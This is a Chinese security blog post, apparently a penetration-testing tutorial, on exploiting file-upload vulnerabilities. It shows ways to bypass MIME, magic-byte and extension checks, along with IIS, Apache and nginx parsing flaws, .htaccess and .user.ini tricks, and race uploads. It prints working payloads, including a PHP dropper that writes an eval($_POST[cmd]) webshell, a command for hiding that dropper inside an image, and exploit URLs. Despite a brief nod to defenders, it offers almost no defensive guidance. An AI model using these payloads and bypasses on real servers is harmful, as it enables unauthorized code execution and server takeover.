<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  

  
  <title>WebSec--文件上传 | V1lu0&#39;blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="|WebSec—文件上传 文件上传漏洞是渗透测试用得最多的一个漏洞，毕竟它能方便快捷直接的获取服务器的权限。 这节我们所讲的就是如果黑客们如何才能玩好文件上传漏洞以及程序员们如何才防护这种危险漏洞？ —BY:V1lu0  |文件类型检测绕过 ——更改请求绕过 ——Magic检测绕过 ——后缀绕过 ——系统命名绕过 —— .user.ini ——文件包含 ——配合操作系统文件命令规则 ——竞争上传绕">
<meta name="keywords" content="WebSec,文件上传">
<meta property="og:type" content="article">
<meta property="og:title" content="WebSec--文件上传">
<meta property="og:url" content="https://v1lu0.github.io/2019/04/07/WebSec-文件上传/index.html">
<meta property="og:site_name" content="V1lu0&#39;blog">
<meta property="og:description" content="|WebSec—文件上传 文件上传漏洞是渗透测试用得最多的一个漏洞，毕竟它能方便快捷直接的获取服务器的权限。 这节我们所讲的就是如果黑客们如何才能玩好文件上传漏洞以及程序员们如何才防护这种危险漏洞？ —BY:V1lu0  |文件类型检测绕过 ——更改请求绕过 ——Magic检测绕过 ——后缀绕过 ——系统命名绕过 —— .user.ini ——文件包含 ——配合操作系统文件命令规则 ——竞争上传绕">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://v1lu0.github.io/2019/04/07/WebSec-文件上传/解析漏洞.jpg">
<meta property="og:image" content="https://v1lu0.github.io/2019/04/07/WebSec-文件上传/20140706214035015.jpg">
<meta property="og:updated_time" content="2019-04-06T17:50:05.126Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="WebSec--文件上传">
<meta name="twitter:description" content="|WebSec—文件上传 文件上传漏洞是渗透测试用得最多的一个漏洞，毕竟它能方便快捷直接的获取服务器的权限。 这节我们所讲的就是如果黑客们如何才能玩好文件上传漏洞以及程序员们如何才防护这种危险漏洞？ —BY:V1lu0  |文件类型检测绕过 ——更改请求绕过 ——Magic检测绕过 ——后缀绕过 ——系统命名绕过 —— .user.ini ——文件包含 ——配合操作系统文件命令规则 ——竞争上传绕">
<meta name="twitter:image" content="https://v1lu0.github.io/2019/04/07/WebSec-文件上传/解析漏洞.jpg">
  
    <link rel="alternate" href="/atom.xml" title="V1lu0&#39;blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">V1lu0&#39;blog</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://v1lu0.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-WebSec-文件上传" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/04/07/WebSec-文件上传/" class="article-date">
  <time datetime="2019-04-06T16:45:29.000Z" itemprop="datePublished">2019-04-07</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/WebSec/">WebSec</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      WebSec--文件上传
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="WebSec—文件上传"><a href="#WebSec—文件上传" class="headerlink" title="|WebSec—文件上传"></a>|WebSec—文件上传</h1><blockquote>
<p>文件上传漏洞是渗透测试用得最多的一个漏洞，毕竟它能方便快捷直接的获取服务器的权限。</p>
<p>这节我们所讲的就是如果黑客们如何才能玩好文件上传漏洞以及程序员们如何才防护这种危险漏洞？</p>
<p>—BY:V1lu0</p>
</blockquote>
<h2 id="文件类型检测绕过"><a href="#文件类型检测绕过" class="headerlink" title="|文件类型检测绕过"></a>|文件类型检测绕过</h2><blockquote>
<p>——更改请求绕过</p>
<p>——Magic检测绕过</p>
<p>——后缀绕过</p>
<p>——系统命名绕过</p>
<p>—— .user.ini</p>
<p>——文件包含</p>
<p>——配合操作系统文件命令规则</p>
<p>——竞争上传绕过</p>
</blockquote>
<h3 id="更改请求绕过"><a href="#更改请求绕过" class="headerlink" title="|更改请求绕过"></a>|更改请求绕过</h3><p>情况：仅在前端检测了文件类型</p>
<p>利用：直接修改网络请求绕过</p>
<p>例如：<code>Content-Type</code> 字段变成图片(image/gif)等</p>
<!--可以看看POST包-->
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST /upload.php HTTP/1.1</span><br><span class="line">TE: deflate,gzip;q=0.3</span><br><span class="line">Connection: TE, close</span><br><span class="line">Host: localhost</span><br><span class="line">User-Agent: libwww-perl/5.803</span><br><span class="line">Content-Type: multipart/form-data; boundary=xsxsx</span><br><span class="line">Content-Length: 155</span><br><span class="line">--xsxsx</span><br><span class="line">Content-Disposition: form-data; name=&quot;userfile&quot;; filename=&quot;V1lu0.php&quot;</span><br><span class="line">Content-Type: image/gif (原为 Content-Type: text/plain)</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">phpinfo();</span><br><span class="line">?&gt;</span><br><span class="line">--xsxsx-</span><br></pre></td></tr></table></figure>
<h3 id="Magic检测绕过"><a href="#Magic检测绕过" class="headerlink" title="|Magic检测绕过"></a>|Magic检测绕过</h3><p>情况：使用文件头来检测文件类型</p>
<p>利用：对应的字节以绕过检查</p>
<div class="table-container">
<table>
<thead>
<tr>
<th>类型</th>
<th>二进制值</th>
</tr>
</thead>
<tbody>
<tr>
<td>JPG</td>
<td>FF D8 FF E0 00 10 4A 46 49 46</td>
</tr>
<tr>
<td>GIF</td>
<td>47 49 46 38 39 61</td>
</tr>
<tr>
<td>PNG</td>
<td>89 50 4E 47</td>
</tr>
<tr>
<td>TIF</td>
<td>49 49 2A 00</td>
</tr>
<tr>
<td>BMP</td>
<td>42 4D</td>
</tr>
</tbody>
</table>
</div>
<blockquote>
<p>举例：</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GIF89a&lt;?php phpinfo(); ?&gt;</span><br></pre></td></tr></table></figure>
<h3 id="后缀绕过"><a href="#后缀绕过" class="headerlink" title="|后缀绕过"></a>|后缀绕过</h3><p>情况：仅根据后缀、上传时的信息或Magic Header来判断文件类型</p>
<p>前提：黑名单校验</p>
<p>黑名单检测解释： blacklist 文件，里面会包含常见的危险脚本文件。</p>
<p>利用：找漏网之鱼</p>
<blockquote>
<p> <strong>php</strong>由于历史原因，部分解释器可能支持符合正则 <code>/ph(p[2-7]?|t(ml)?)/</code> 的后缀，如 <code>php</code> / <code>php5</code> / <code>pht</code> / <code>phtml</code> / <code>shtml</code> / <code>pwml</code> / <code>phtm</code> 等 可在禁止上传php文件时测试该类型。</p>
<p><strong>jsp</strong>引擎则可能会解析 <code>jspx</code> / <code>jspf</code> / <code>jspa</code> / <code>jsw</code> / <code>jsv</code> / <code>jtml</code> 等后缀，asp支持 <code>asa</code> / <code>asax</code> / <code>cer</code> / <code>cdx</code> / <code>aspx</code> / <code>ascx</code> / <code>ashx</code> / <code>asmx</code> / <code>asp{80-90}</code> 等后缀。</p>
<p>除了这些绕过，<strong>其他的后缀</strong>同样可能带来问题，如 <code>vbs</code> / <code>asis</code> / <code>sh</code> / <code>reg</code> / <code>cgi</code> / <code>exe</code> / <code>dll</code> / <code>com</code> / <code>bat</code> / <code>pl</code> / <code>cfc</code> / <code>cfm</code> / <code>ini</code> 等。</p>
</blockquote>
<h3 id="系统命名绕过"><a href="#系统命名绕过" class="headerlink" title="|系统命名绕过"></a>|系统命名绕过</h3><blockquote>
<p>在<strong>Windows系统</strong>中，上传<code>index.php.</code>会重命名为<code>.</code>，可以绕过后缀检查。</p>
<p>也可尝试 <code>index.php ``，``index.php:1.jpg</code> <code>index.php::$DATA</code> 等。 </p>
<p>在<strong>Linux系统</strong>中，可以尝试上传名为 <code>index.php/.</code> 或 <code>./aa/../index.php/.</code> 的文件</p>
</blockquote>
<h3 id="user-ini"><a href="#user-ini" class="headerlink" title="| .user.ini"></a>| .user.ini</h3><blockquote>
<p>在php执行的过程中，除了主 <code>php.ini</code> 之外，PHP 还会在每个目录下扫描 INI 文件，从被执行的 PHP 文件所在目录开始一直上升到 web 根目录（$_SERVER[‘DOCUMENT_ROOT’] 所指定的）。如果被执行的 PHP 文件在 web 根目录之外，则只扫描该目录。 <code>.user.ini</code> 中可以定义除了PHP_INI_SYSTEM以外的模式的选项，故可以使用 <code>.user.ini</code> 加上非php后缀的文件构造一个shell，比如 <code>auto_prepend_file=01.gif</code> 。</p>
</blockquote>
<h3 id="文件包含"><a href="#文件包含" class="headerlink" title="|文件包含"></a>|文件包含</h3><p>情况：只校验当文件后缀名为asp/php/jsp的文件<strong>内容</strong>是否为木马</p>
<p>利用：（php为例）</p>
<blockquote>
<p>（1）先上传一个内容为木马的txt后缀文件，因为后缀名的关系没有检验内容；<br>（2）然后再上传一个.php的文件，内容为&lt;?php Include(“上传的txt文件路径”);?&gt;</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#PHP    </span><br><span class="line">&lt;?php Include(&quot;上传的txt文件路径&quot;);?&gt; </span><br><span class="line">#ASP    </span><br><span class="line">&lt;!--#include file=&quot;上传的txt文件路径&quot; --&gt;</span><br><span class="line">#JSP    </span><br><span class="line">&lt;jsp:inclde page=&quot;上传的txt文件路径&quot;/&gt;</span><br><span class="line">or  </span><br><span class="line">&lt;%@include file=&quot;上传的txt文件路径&quot;%&gt;</span><br></pre></td></tr></table></figure>
<h3 id="配合操作系统文件命令规则"><a href="#配合操作系统文件命令规则" class="headerlink" title="|配合操作系统文件命令规则"></a>|配合操作系统文件命令规则</h3><blockquote>
<p>（1）上传不符合<strong>windows</strong>文件命名规则的文件名<br>　　test.asp.<br>　　test.asp(空格)<br>　　test.php:1.jpg<br>　　test.php::$DATA<br>　　shell.php::$DATA…….<br>会被windows系统自动去掉不符合规则符号后面的内容。<br>（2）<strong>linux</strong>下后缀名大小写<br>在linux下，如果上传php不被解析，可以试试上传pHp后缀的文件名。</p>
</blockquote>
<h4 id><a href="#" class="headerlink" title=" "></a> </h4><h2 id="解析漏洞"><a href="#解析漏洞" class="headerlink" title="|解析漏洞"></a>|解析漏洞</h2><p><img src="/2019/04/07/WebSec-文件上传/./解析漏洞.jpg" alt="图示"></p>
<h3 id="IIS系列"><a href="#IIS系列" class="headerlink" title="|IIS系列"></a>|IIS系列</h3><p>   ||</p>
<p>   ||</p>
<p>        /</p>
<p>     /</p>
<h4 id="IIS5-x-6-x解析漏洞"><a href="#IIS5-x-6-x解析漏洞" class="headerlink" title="|IIS5.x-6.x解析漏洞"></a>|IIS5.x-6.x解析漏洞</h4><p>可能被IIS当做asp程序执行的后缀有：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">.asp</span><br><span class="line">.cer</span><br><span class="line">.asa</span><br><span class="line">.cdx</span><br></pre></td></tr></table></figure>
<h4 id="IIS-6-0-文件解析漏洞"><a href="#IIS-6-0-文件解析漏洞" class="headerlink" title="|IIS 6.0 文件解析漏洞"></a>|IIS 6.0 文件解析漏洞</h4><p>备注：IIS5.1和IIS7.5无此漏洞。</p>
<p>原理：IIS 6.0在处理含有特殊符号的文件路径时会出现逻辑错误，从而造成文件解析漏洞</p>
<p>利用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/test.asp/test.jpg</span><br><span class="line">test.asp;.jpg</span><br></pre></td></tr></table></figure>
<blockquote>
<p><strong>第一种：</strong></p>
<p>新建一个名为“test.asp”的目录，该目录中的任何文件都被IIS当做asp程序执行（特殊符号是“/”）</p>
<p><strong>第二种：</strong></p>
<p>上传名为“test.asp;.jpg”的文件，虽然该文件真正的后缀名是“.jpg”，但由于含有特殊符号“;”，仍会被IIS当做asp程序执行。</p>
</blockquote>
<p><strong>遇到php时文件解析问题</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.jpg/.php</span><br></pre></td></tr></table></figure>
<p><strong>知识：</strong></p>
<p> <strong>Windows操作系统中，文件名不能以空格或“.”开头，也不能以空格或“.”结尾。当把一个文件命名为以空格或“.”开头或结尾时，会自动地去掉开头和结尾处的空格和“.”。利用此特性，也可能造成“文件解析漏洞”。</strong></p>
<h4 id="IIS7-amp-7-5解析漏洞"><a href="#IIS7-amp-7-5解析漏洞" class="headerlink" title="|IIS7&amp;7.5解析漏洞"></a>|IIS7&amp;7.5解析漏洞</h4><p>  IIS7/7.5在Fast-CGI运行模式下,在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。</p>
<blockquote>
<p><strong>常用利用方法</strong>：将一张图和一个写入后门代码的文本文件合并将恶意文本写入图片的二进制代码之后，避免破坏图片文件头和尾</p>
<p>e.g. copy xx.jpg/b + yy.txt/a xy.jpg</p>
<p>######################################</p>
<p>/b 即二进制[binary]模式</p>
<p>/a 即ascii模式 xx.jpg正常图片文件</p>
<p>yy.txt 内容 &lt;?PHPfputs(fopen(‘shell.php’,’w’),’&lt;?php eval($_POST[cmd])?&gt;’);?&gt;</p>
<p>意思为写入一个内容为 &lt;?php eval($_POST[cmd])?&gt; 名称为shell.php的文件</p>
<p>######################################</p>
<p>找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址，在地址后加上 /xx.php 即可执行恶意文本。</p>
<p>然后就在图片目录下生成一句话木马 shell.php 密码 cmd</p>
</blockquote>
<p> ————————————————————————————</p>
<!--形式：a.aspx.a;.a.aspx.jpg..jpg   一定要开启了cgi.fix_pathinfo，-->
<blockquote>
<p><strong>注意：</strong></p>
<p>1.该解析漏洞利用需两个条件：</p>
<p>php.ini里cgi.fix_pathinfo=1(默认为1)</p>
<p>2.在”Handler Mapping”中取消勾选以下内容：</p>
<p><img src="/2019/04/07/WebSec-文件上传/./20140706214035015.jpg" alt="img"></p>
</blockquote>
<h3 id="apache解析漏洞"><a href="#apache解析漏洞" class="headerlink" title="|apache解析漏洞"></a>|apache解析漏洞</h3><p><strong>漏洞原理</strong>：Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 test.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php。</p>
<p><strong>漏洞形式</strong>：www.xxxx.xxx.com/test.php.php123</p>
<p><strong>其余配置问题导致漏洞</strong>：（1）如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。<br>（2）如果在 Apache 的 conf 里有这样一行配置 AddType application/x-httpd-php .jpg 即使扩展名是 jpg，一样能以 php 方式执行。</p>
<h3 id="nginx解析漏洞"><a href="#nginx解析漏洞" class="headerlink" title="|nginx解析漏洞"></a>|nginx解析漏洞</h3><p><strong>漏洞原理：</strong>Nginx默认是以CGI的方式支持PHP解析的，普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问www.xx.com/phpinfo.jpg/1.php这个URL时，$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”，然后构造成SCRIPT_FILENAME传递给PHP CGI，但是PHP为什么会接受这样的参数，并将phpinfo.jpg作为PHP文件解析呢?这就要说到<strong>fix_pathinfo</strong>这个选项了。 如果开启了这个选项，那么就会触发在PHP中的如下逻辑：</p>
<p>PHP会认为SCRIPT_FILENAME是phpinfo.jpg，而1.php是PATH_INFO，所以就会将phpinfo.jpg作为PHP文件来解析了</p>
<p><strong>漏洞形式：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">www.xxxx.com/UploadFiles/image/1.jpg/1.php</span><br><span class="line">www.xxxx.com/UploadFiles/image/1.jpg%00.php</span><br><span class="line">www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php</span><br></pre></td></tr></table></figure>
<!--xxx.jpg%00.php (Nginx <8.03 空字节代码执行漏洞)-->
<p>另外一种手法：上传一个名字为test.jpg，以下内容的文件。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?PHP fputs(fopen(&apos;shell.php&apos;,&apos;w&apos;),&apos;&lt;?php eval($_POST[cmd])?&gt;&apos;);?&gt;</span><br></pre></td></tr></table></figure>
<p>然后访问test.jpg/.php,在这个目录下就会生成一句话木马shell.php。</p>
<h3 id="竞争上传绕过"><a href="#竞争上传绕过" class="headerlink" title="|竞争上传绕过"></a>|竞争上传绕过</h3><p>有的服务器采用了先保存，再删除不合法文件的方式，在这种服务器中，可以反复上传一个会生成Web Shell的文件并尝试访问，多次之后即可获得Shell。</p>
<h2 id="攻击技巧"><a href="#攻击技巧" class="headerlink" title="|攻击技巧"></a>|攻击技巧</h2><h3 id="Apache重写GetShell"><a href="#Apache重写GetShell" class="headerlink" title="|Apache重写GetShell"></a>|Apache重写GetShell</h3><p>Apache可根据是否允许重定向考虑上传.htaccess</p>
<p>内容为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">AddType application/x-httpd-php .png</span><br><span class="line">php_flag engine 1</span><br></pre></td></tr></table></figure>
<p>就可以用png或者其他后缀的文件做php脚本了</p>
<h3 id="软链接任意读文件"><a href="#软链接任意读文件" class="headerlink" title="|软链接任意读文件"></a>|软链接任意读文件</h3><p>上传的压缩包文件会被解压的文件时，可以考虑上传含符号链接的文件 若服务器没有做好防护，可实现任意文件读取的效果</p>
<h2 id="FUZZ"><a href="#FUZZ" class="headerlink" title="|FUZZ"></a>|FUZZ</h2><p>上面我们针对和上传漏洞相关的每个方面进行了细致的分析，也提供了相关的核心代码。最终整合后的代码限于边幅，就放在github上了。</p>
<p><strong>github：<a href="https://github.com/c0ny1/upload-fuzz-dic-builder" target="_blank" rel="noopener">https://github.com/c0ny1/upload-fuzz-dic-builder</a></strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$ python upload-fuzz-dic-builder.py -h</span><br><span class="line">usage: upload-fuzz-dic-builder [-h] [-n] [-a] [-l] [-m] [--os] [-d] [-o]</span><br><span class="line"></span><br><span class="line">optional arguments:</span><br><span class="line">  -h, --help            show this help message and exit</span><br><span class="line">  -n , --upload-filename</span><br><span class="line">                        Upload file name</span><br><span class="line">  -a , --allow-suffix   Allowable upload suffix</span><br><span class="line">  -l , --language       Uploaded script language</span><br><span class="line">  -m , --middleware     Middleware used in Web System</span><br><span class="line">  --os                  Target operating system type</span><br><span class="line">  -d, --double-suffix   Is it possible to generate double suffix?</span><br><span class="line">  -o , --output         Output file</span><br></pre></td></tr></table></figure>
<p>脚本可以之定义生成的上传文件名（-n），允许的上传的后缀（-a），后端语言（-l），中间件(-m),操作系统（–os），是否加入双后缀（-d）以及输出的字典文件名（-o）。我们可以根据场景来生成合适的字典，提供的信息越详细，脚本生成的字典越精确。</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="|参考链接"></a>|参考链接</h2><ul>
<li><p><a href="https://www.freebuf.com/articles/web/188464.html" target="_blank" rel="noopener">构造优质上传漏洞Fuzz字典</a></p>
</li>
<li><p>wikisec</p>
</li>
</ul>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://v1lu0.github.io/2019/04/07/WebSec-文件上传/" data-id="cjzg9kojp000bu4vb0bn7pawd" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/WebSec/">WebSec</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/文件上传/">文件上传</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2019/02/17/乐培生授权测试CNVD-2019-02445/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">2019第一份授权测试-乐培生</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/WebSec/">WebSec</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/授权测试/">授权测试</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/WebSec/">WebSec</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web安全/">web安全</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/乐培生/">乐培生</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/授权测试/">授权测试</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/文件上传/">文件上传</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/WebSec/" style="font-size: 10px;">WebSec</a> <a href="/tags/web安全/" style="font-size: 10px;">web安全</a> <a href="/tags/乐培生/" style="font-size: 10px;">乐培生</a> <a href="/tags/授权测试/" style="font-size: 10px;">授权测试</a> <a href="/tags/文件上传/" style="font-size: 10px;">文件上传</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/04/">April 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/02/">February 2019</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2019/04/07/WebSec-文件上传/">WebSec--文件上传</a>
          </li>
        
          <li>
            <a href="/2019/02/17/乐培生授权测试CNVD-2019-02445/">2019第一份授权测试-乐培生</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 V1lu0<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<!--
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
-->
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-MML-AM_CHTML"></script>

<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/haruto.model.json"},"display":{"position":"right","width":100,"height":200},"mobile":{"show":true},"log":false,"tagMode":false});</script></body>
</html>